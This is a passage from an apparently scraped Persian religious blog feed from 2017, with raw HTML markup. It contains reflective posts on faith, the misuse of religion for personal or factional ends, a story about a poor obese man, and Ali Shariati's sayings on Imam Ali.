۳۰ هزار تومان دستمزد بدهد. ندارد و مجبور است کمتر حمام کند.</font><br><font face="Mihan-IransansBold"> مرد ۳۱۶ کیلورمی باید روزانه، قرص و داروهایی مصرف کند که متاسفانه ماه هاست به خاطر تنگدستی دوره درمانی و مصرف داروها را رها کرده است. پزشکان می گویند با توجه به شرایط خاص آقا موسی اگر این طور پیش برود وزن او به زودی به نیم تن می رسد!</font></font></span></font><br></div><br><br><br> <b></b> <font style="font-size:8pt;"> </font> </div></div></div> text/html 2017-06-19T12:23:18+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی ﻫﻤﻪ ﺧﺪﺍﺕ ﻣﯿﺸﻦ ﺍﻻ ﺧﺪﺍ ... http://1001SHAYADOBAYAD.mihanblog.com/post/3521 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <span style="background-color: #9999FF"><font size="6" face="Arial"><u> <span style="text-decoration: overline"><font color="#CE0000">&nbsp;</font></span></u><a href="http://shenasname.com/index5.php?code=3190" style="text-decoration: overline blink"><font color="#CE0000">ﻫﻤﻪ ﺧﺪﺍﺕ ﻣﯿﺸﻦ ﺍﻻ ﺧﺪﺍ ...&nbsp; </font></a></font></span></p> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <p style="line-height: 75px; margin-top: 0; margin-bottom: 0"> <span style="vertical-align: bottom"> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: 60PX; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; ﮔﻔﺘﻢ: فلانی ﺑﺎ ﺍﯾﻦ ﺩﺭﺁﻣﺪﺕ ﺯﻧﺪﮔﯿﺖ ﻣﯿﭽﺮﺧﻪ؟ ﮔﻔﺖ: ﺧﺪﺍ ﺭﻭ ﺷﮑﺮ، ﮐﻢ ﻭ ﺑﯿﺶ ﻣﯿﺴﺎﺯﯾﻢ. ﺧﺪﺍ ﺧﻮﺩﺵ میرﺳﻮﻧﻪ. ﮔﻔﺘﻢ : ﺣﺎﻻ ﻣﺎ ﺩﯾﮕﻪ ﻏﺮﯾﺒﻪ ﺷﺪﯾﻢ ﻟﻮ ﻧﻤﯿﺪﯼ؟ ﮔﻔﺖ: ﻧﻪ ﯾﻪ ﺧﻮﺭﺩﻩ ﻗﻨﺎﻋﺖ ﻣﯿﮑﻨﻢ ﮔﺎﻫﯽ ﺍﻭﻗﺎﺕ ﻫﻢ کاﺭ ﺩﯾﮕﻪ ﺍﯼ ﺟﻮﺭ ﺑﺸﻪ ﺍﻧﺠﺎﻡ ﻣﯿﺪﻡ، ﺧﺪﺍ ﺑﺰﺭﮔﻪ ﻧﻤﯿﺬﺍﺭﻩ ﺩﺳﺖ ﺧﺎﻟﯽ ﺑﻤﻮﻧﻢ. ﮔﻔﺘﻢ: ﻧﻪ ﺭﺍﺳﺘﺸﻮ ﺑﮕﻮ. ﮔﻔﺖ: ﻫﺮ ﻭﻗﺖ ﮐﻢ ﺁﻭﺭﺩﻡ ﯾﻪ ﺟﻮﺭﯼ ﺣﻞ ﺷﺪﻩ ﺧﺪﺍ ﺭﺯﺍﻗﻪ، ﻣﯿﺮﺳﻮﻧﻪ. ﮔﻔﺘﻢ: ﺍﯼ ﺑﺎﺑﺎ ﻣﺎ ﻧﺎﻣﺤﺮﻡ ﻧﯿﺴﺘﯿﻢ. ﺭﺍﺳﺘﺸﻮ ﺑﮕﻮ دﯾﮕﻪ. ﮔﻔﺖ: ﺗﻮ ﻓﮑﺮ ﮐﻦ ﯾﻪ ﺗﺎﺟﺮ ﺗﻮﯼ ﺑﺎﺯﺍﺭ ﻫﺴﺖ ﻫﺮ ﻣﺎﻩ ﯾﻪ ﻣﻘﺪﺍﺭ ﭘﻮﻝ ﺑﺮﺍﻡ ﻣﯿﺎﺭﻩ ﮐﻤﮏ ﺧﺮﺟﻢ ﺑﺎﺷﻪ. ﮔﻔﺘﻢ: ﺁﻫﺎﻥ، ﻧﺎﻗﻼ ﺩﯾﺪﯼ ﮔﻔﺘﻢ. ﺣﺎﻻ ﺷﺪ ﯾﻪ ﭼﯿﺰﯼ. ﭼﺮﺍ ﺍﺯ ﺍﻭﻝ ﺭﺍﺳﺘﺸﻮ ﻧﻤﯿﮕﯽ؟ ﮔﻔﺖ : ﺑﯽ ﺍﻧﺼﺎﻑ ﺳﻪ ﺑﺎﺭ ﮔﻔﺘﻢ ﺧﺪﺍ ﻣﯿﺮﺳﻮنه ﺑﺎﻭﺭﻧﮑﺮﺩﯼ ﯾﮏ ﺑﺎﺭ ﮔﻔﺘﻢ ﯾﻪ تاجر ﻣﯿﺮﺳﻮﻧﻪ ﺑﺎﻭﺭﮐﺮﺩﯼ. ﯾﻌﻨﯽ ﺧﺪﺍ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﯾﻪ تاجر ﭘﯿﺶ ﺗﻮ ﺍﻋﺘﺒﺎﺭ ﻧﺪﺍﺭﻩ؟ ﻫﯽ ﺳﺠﺪﻩ ﻣﯿﮑﻨﯿم ﻭﻟﯽ ﻫﻨﻮﺯﺧﻮﺏ ﺑﺎﻭﺭﻧﺪﺍﺭﯾﻢ ﮐﻪ ﯾﮑﯽ ﺍﻭﻥ ﺑﺎﻻﻫﺴﺖ ﮐﻪ ﺣﻮﺍﺳﺶ ﺑﻪ ﻣﺎﺳﺖ. تا اﯾﻦ ﺷﮏ ﺑﻪ ﯾﻘﯿﻦ ﻧﺮﺳﻪ ﻫﻤﻪ ﺧﺪﺍﺕ ﻣﯿﺸﻦ ﺍﻻ ﺧﺪﺍ. </b></font></span></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> &nbsp;</p> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-06-18T19:39:12+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی سلیقه‌های شخصی و برداشت‌های فردی به اسم اسلام http://1001SHAYADOBAYAD.mihanblog.com/post/3520 <div> <h2><br> </h2><h2><br></h2><h2><span style="color: rgb(102, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="6" face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/%28X%281%29S%28fm11arvqpmv3rnigm1fiqlxo%29%29/detail/677134/weblog/zaeri"><span style="background-color: rgb(102, 102, 102);"><span style="color: rgb(255, 0, 0);">&nbsp; سلیقه‌های شخصی و برداشت‌های فردی به اسم اسلام&nbsp;&nbsp;</span></span> </a></font></span></span></h2><p><br></p> <div class="newsPhoto"> <img src="http://images.khabaronline.ir/images/2017/6/position50/17-6-6-232841photo_2017-05-26_04-44-11.jpg" class="thumbnail" height="277" width="370"> </div> <div class="leadCont"> <p> <span><br></span></p><p style="text-align: justify;"><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4"><span>وبلاگ&nbsp; زائری، محمدرضا : </span>در شهادت امیر مؤمنان باید بر بی پناهی نسلی مویه کرد که امامشان را در حد قامت های ناساز خویش کوتاه کرده ایم! باید بر مظلومیت نسلی گریست که امام شان را در قواره حقارت ها و ناتوانی های خودمان شناسانده ایم! </font></span></span></p><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4"> </font></span></span></div><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4"> </font></span></span><div class=" clear" style="text-align: justify;"> </div><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4"> </font></span></span><p style="text-align: justify;"><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4">آن علی که دلها برایش می تپد کسی است که تحملش از کوهها بیشتر است و فهمش از دریاها فراتر! آن علی که همه با یک نظر شیفته اش می شوند کسی است که نان جو می خورد و آهن داغ را به دست برادر نزدیک می کند! آن علی که در کلیسا نقش تمثالش را به عنوان قدیس مسیحیت بر دیوار می کشند و در آتشگاه از نور جمالش جان می گیرند کسی است که سوزنی از بیت المال را حتى در دست دختر جز به امانت تاب نمی آورد و آمده برای ساختن انسان و جهان! <br>آن علی که نامش جهان را گرفته و آوازه اش از کهکشان ها گذشته آن است که انسان را می فهمد و جهان را می شناسد و برای همه پدری می کند!<br>گرسنگی می کشد تا دیگران سیر شوند و تشنه می ماند تا دیگران را سیراب سازد!<br>وقتی آن علی اقیانوسْ دل و کهکشانْ جان را که پدر عالم و آدم است در حد یک رقیب بازی های کودکانه پایین کشیدیم و دغدغه انسان سازی او را در حد قیافه و شکل آدم ها ساده کردیم و مسأله انسان پردازی و جهان سازی او را به پایین ترین سطح ظاهر شرع تقلیل دادیم طبیعی است که این علی جدید برساخته ما دل از کسی نبرد و جان کسی را برنیاشوبد!<br><span style="background-color: rgb(153, 153, 153);"><span style="color: rgb(255, 0, 0);">وقتی به جای نهج البلاغه آتشین و خروشان ، رساله توضیح المسائل را گذاشتیم و همه دین را در قامت یک حکم شرعی و ظاهری که تازه فقها بر سر شکل و ابعادش اختلاف دارند و بعضا مستحب می دانند تقلیل دادیم معلوم است که دیگر این دین تازه و جدید ما با جان و دل کسی سازگار نمی شود!</span></span> <br>وقتی عدالت را و برابری را و قسط را نه تنها نابود و محکوم کردیم بلکه به زیاده خواهی ها و ویژه خواری ها رنگ تقدس و باور زدیم بی شک <span style="color: rgb(255, 0, 0);">این تعارض و تناقض انسان منطقی و عاقل را پس می زند!</span><br>وقتی که همه مسائل مان در حد فوتبال بانوان و کنسرت موسیقی سطحی شد آن وقت هزار هزار نفر را به بهانه ساز موسیقی و سستی در حجاب و شکل ظاهرشان از دین دور می کنیم و فاصله هایشان روز به روز از دینی که ما عرضه کرده ایم بیشتر می شود و "یخرجون" من دین الله افواجا... همه به خاطر این که حقیقت را در چند متر پارچه خلاصه کرده ایم و شابلون و متر خودمان را گذاشته ایم <span style="color: rgb(255, 0, 0);">که هرکس مثلا حجابش چادر آنهم مشکی نبود و هر کس ریش و قیافه اش با سلیقه ما تطبیق نمی کرد بی دین است! </span><br><span style="color: rgb(255, 0, 0);"><span style="background-color: rgb(153, 153, 153);">و طبیعی است که روز به روز بی دین ها بیشتر بشوند! </span></span><br>و در چنین شرایطی است که حتى مدعیان دین داری هم چنان به ساخته های ذهنی خود عادت می کنند که تاب شنیدن حقیقت را ندارند !<br><span style="color: rgb(255, 0, 0);">وقتی سلیقه های شخصی و برداشت های فردی مان را به اسم اسلام جا انداختیم</span> به مرور چنان به آنها عادت می کنیم که اگر کسی از قرآن کریم آیه ای صریح تلاوت کند یا از بحارالانوار و نهج البلاغه هم برایمان حدیثی قاطع بخواند باز یا توجیه می کنیم، یا نمی شنویم، یا فهم خود را بر نص کلام خدا و اولیای خدا ترجیح می دهیم و این می شود که <span style="color: rgb(255, 0, 0);">به مرور چیزی را به اسم اسلام عرضه می کنیم که بسیاری افراد ندای فطرت و درونشان را از آن نمی شنوند و به آن گرایش پیدا نمی کنند!</span> آن وقت به ضدیت با اسلام و بی دینی متهم می شوند! آنچه امام هشتم علیه السلام فرمود همین بود که : علموا الناس محاسن کلامنا...<span style="background-color: rgb(255, 255, 255);"> <span style="color: rgb(0, 204, 0);">حرف حساب و دعوت دلنشین ما را به مردم برسانید تا با تمام وجود بیایند، حرف خودتان را به اسم ما نزنید! و در شهادت امیر مؤمنان بیش از مظلومیت او باید بر مظلومیت نسلی گریست که از حقیقت علوی و هدایت ولایت او به خاطر رفتار و گفتار ما محروم مانده اند!</span></span></font></span></span></p><p style="text-align: justify;"><span style="color: rgb(0, 0, 255);"><span style="background-color: rgb(153, 255, 255);"><font size="4"><span style="background-color: rgb(255, 255, 255);"><span style="color: rgb(0, 204, 0);"><br></span></span></font></span></span></p><p> </p> <div class="tags"> <font size="3">برچسب‌ها: <a href="/tag/به-اسم-اسلام">به اسم اسلام</a>، <a href="/tag/بی-دینی">بی دینی</a>، <a href="/tag/حرف-حساب">حرف حساب</a>، <a href="/tag/مظلومیت-نسل-امروز">مظلومیت نسل امروز</a></font> </div> <script> blogsky.ajax.onPostLikeBegin = function(e) { var postLikeCountElement = document.getElementById("post-like-count-" + e.id); var postLikeCount = parseInt(postLikeCountElement.innerHTML); postLikeCountElement.innerHTML = postLikeCount + 1; } blogsky.ajax.onPostLikeFailure = function(e) { var postLikeCountElement = document.getElementById("post-like-count-" + e.id); postLikeCountElement.innerHTML = parseInt(postLikeCountElement.innerHTML) - 1; var postLikeErrorMessage = document.getElementById("post-like-error-message-" + e.id); postLikeErrorMessage.innerHTML = e.error; setTimeout(function () { postLikeErrorMessage.innerHTML = ""; }, 5000); }</script><br><br><br><div class="dt-bottom"> </div> </div> text/html 2017-06-17T14:01:22+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی جناحی‌شدن تریبون‌های مذهبی http://1001SHAYADOBAYAD.mihanblog.com/post/3519 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><h2><font color="#6600CC"><span style="background-color: rgb(204, 204, 255);"><font size="6" face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/detail/675985/weblog/ghorouban">&nbsp; جناحی‌شدن تریبون‌های مذهبی&nbsp;&nbsp; <br></a></font></span></font></h2><p><br></p> <div class="newsPhoto"> <img src="http://images.khabaronline.ir/images/2017/6/position50/15-8-14-11451515-7-5-17474_mg_2201.jpg" class="thumbnail" height="328" width="493"> </div> <div class="leadCont"> <p align="justify"><br></p><p align="justify"> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span>وبلاگ غرویان، محسن : </span>مذهب یکی از عناصر فرهنگی بسیار دارای نفوذ در مردم است و در تفکر و زندگی مردم نقش دارد. </font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div></div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><div class=" clear" align="justify"> </div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><div class="body" align="justify"> <p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">تریبون‌های مذهبی هم تریبون‌هایی هستند كه می‌توانند در مسائل فرهنگی، اقتصادی و سیاسی جامعه تأثیر بگذارند. اما در این میان عده‌ای هستند كه از این ابزار برای مقاصد جناحی، شخصی و گروهی خود استفاده می‌كنند.<br>استفاده جناحی از تریبون‌های مذهبی، ظلم به دین است. در محافل مذهبی می‌توان مسائل عام دینی را طرح كرد و اینكه بوسیله این تربیون‌ها بخواهیم مردم را به سمت جناح سیاسی خودمان بكشانیم، این خیانت به مذهب است.<br>اینكه الان مردم به ماهواره و شبكه‌های اجتماعی روی آوردند، علتش را باید در تبدیل شدن محافل مذهبی ما به محل جنگ و نزاع، جستجو كرد. مردم از این سوء استفاده‌های سیاسی به نام مذهب و دین،خسته شده‌اند.<br><br>ما باید بیشتر به مسائل روحی و اخلاقی كه همه خواهان شنیدن آن هستند بپردازیم، نه به مسائل خاص جناحی و سیاسی. هشدار نسبت به نحوه عمل تریبون‌های مذهبی، نكته‌ای است كه سال‌ها بیان می‌شود. مردم یك ظرفیت خاصی دارند و وقتی ببینند كه افراط و تفریط می‌شود از مسائل و معارف دینی روی برمی‌گردانند.<br><font color="#009900"><span style="background-color: rgb(255, 255, 255);">همین كه مردم تشخیص بدهند یك مداح یا سخنران، اهداف گروهی و جناحی خاص خودش را از پشت تریبون مطرح می‌كند، اعتمادشان از دین و مذهب و محافل مذهبی سلب می‌شود، اما اگر بدانند كه سخنران و مداح درد مردم را بیان می‌كند به آن رغبت نشان می‌دهند.</span></font></font></span></font></p><p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><font color="#009900"><span style="background-color: rgb(255, 255, 255);"><br></span></font></font></span></font></p> </div><br> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/جناحی‌شدن">جناحی‌شدن</a>، <a href="/post/tag/تریبون‌های مذهبی">تریبون‌های مذهبی</a>،</font><br><br></font> </div> text/html 2017-06-16T12:16:10+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی علی علیه السلام از نگاه دکترعلی شریعتی http://1001SHAYADOBAYAD.mihanblog.com/post/3518 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><p style="text-align: justify;"><span style="font-size: small;"><strong><br></strong></span></p><p style="text-align: justify;"><span style="font-size: small;"><strong><br></strong></span></p><p style="text-align: justify;"><br><strong><b><font size="5" face="Microsoft Sans Serif" color="#0033CC"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; "><span style="font-size: small; text-decoration: overline blink; background-color: #F2F2F2"><font size="6" face="Arial"><a href="http://talar.shandel.info/thread-205.html"><font color="#0033CC"><font color="#009900"><span style="background-color: rgb(255, 255, 204);">&nbsp; علی علیه السلام از نگاه دکترعلی شریعتی &nbsp;</span></font> <br></font></a></font></span></b></font></b></strong></p><p style="text-align: justify;"><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><strong><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221142%D9%84%D8%A7%DB%8C%D8%B9%D8%B1%D9%81%DA%A9.jpg" height="270" width="518"><br></strong></span></span></span></span></p> <p style="text-align: justify;"><font size="5" face="Mihan-Koodak"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... علی کسی است که، نه تنها با اندیشه و سخنش، بلکه با وجود و زندگی‌اش، به همه دردها و نیازها و همه احتیاج‌های چندگونه بشری، در همه دوره‌ها، پاسخ می‌دهد..."</span></font></span></font><span style="font-size: small;"><br></span></font><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-222950%D8%B0%DA%A9%D8%B1%20%D8%B9%D9%84%DB%8C%20%D8%B9%D8%A8%D8%A7%D8%AF%D9%87.jpg" height="310" width="519"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><strong><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... هرکه علی‌وار زندگی کند و علی‌وار کار کند و علی‌وار سخن بگوید و علی‌وار بیندیشد، نمی‌تواند از سرنوشت محتوم علی‌وار بگریزد..."</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-22360%D9%86%D9%88%D8%B4%D8%AA%D9%86%20%D9%81%D8%B6%D8%A7%DB%8C%D9%84%20%D8%B9%D9%84%DB%8C.jpg" height="313" width="521"><br></span></span></span></span></strong></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;"><br>"... علی... که همه ارزشها در برابرش بی‌مقدار می نماید و همه قدرتها و عظمتها در قیاسش ضعف و حقارت به نظر می‌آید..."</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221627%D8%AE%DB%8C%D8%B1%D8%A7%D9%84%D8%A8%D8%B4%D8%B1.jpg" height="388" width="520"><br></span></span></span></span></p> <span style="font-size: small;"> </span><span style="font-size: small;"> </span> <p style="text-align: justify;"><strong><span style="color: #339966;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... ارزش‌های علی در بی‌نیازتر بودنش از دیگران نیست، بلکه در احساس کردنِ نیازهای بلندتر و متعالی‌تر اوست نسبت به دیگران و همچنین در احساس نیازمندتر بودن و احساس کمبود بیشتر کردن او در هستی است؛ که دیگران چنین احساسی را ندارند..."</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221730%D8%B9%D9%84%DB%8C%20%D9%85%D8%B9%20%D8%A7%D9%84%D8%AD%D9%82.jpg" height="354" width="518"><br></span></span></span></span></span></strong></p> <span style="font-size: small;"> </span><span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... <strong>علی، مظهر توحید</strong> و انسانی که رسالت تاریخی تمامی پیامبران در او تجسم یافته و وجودش جوهر همه انقلاب‌های توحیدی است و گردابی است که تمامی ‌رودهایی که در طول تاریخ عدالت و آزادی و برابری بشری از انقلاب‌ها و نهضت‌ها سرچشمه گرفته و با جور و جبر و تبعیض در کشاکش بوده است در او می‌ریزد..."</span></font></span></font><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><br></span><span style="font-size: small;"><span style="font-size: small;"><span style="font-size: small;"><img src="http://images.khabaronline.ir//images/2013/10/13-10-22-221821%D8%AD%D8%A83.jpg" height="775" width="518"><br></span></span></span></span></p> <span style="font-size: small;"> </span> <p style="text-align: justify;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="font-size: small;">"... به عنوان یک من علی‌وار: یک روح در چند بعد: خداوند سخن، بر منبر، خداوند پرستش در محراب؛ خداوند کار، در زمین؛ خداوند پیکار، در صحنه؛ خداوند وفا، در کنار محمد، خداوند مسئولیت در جامعه، خداوند قلم، در نهج‌البلاغه؛ خداوند پارسایی، در زندگی؛ خداوند دانش، در اسلام؛ خداوند انقلاب، در زمان؛ خداوند عدل، در حکومت؛ خداوند پدری و انسان‌پروری، در خانه؛ و... بنده خدا، در همه‌جا، در همه وقت!..."</span></font></span></font><span style="font-size: 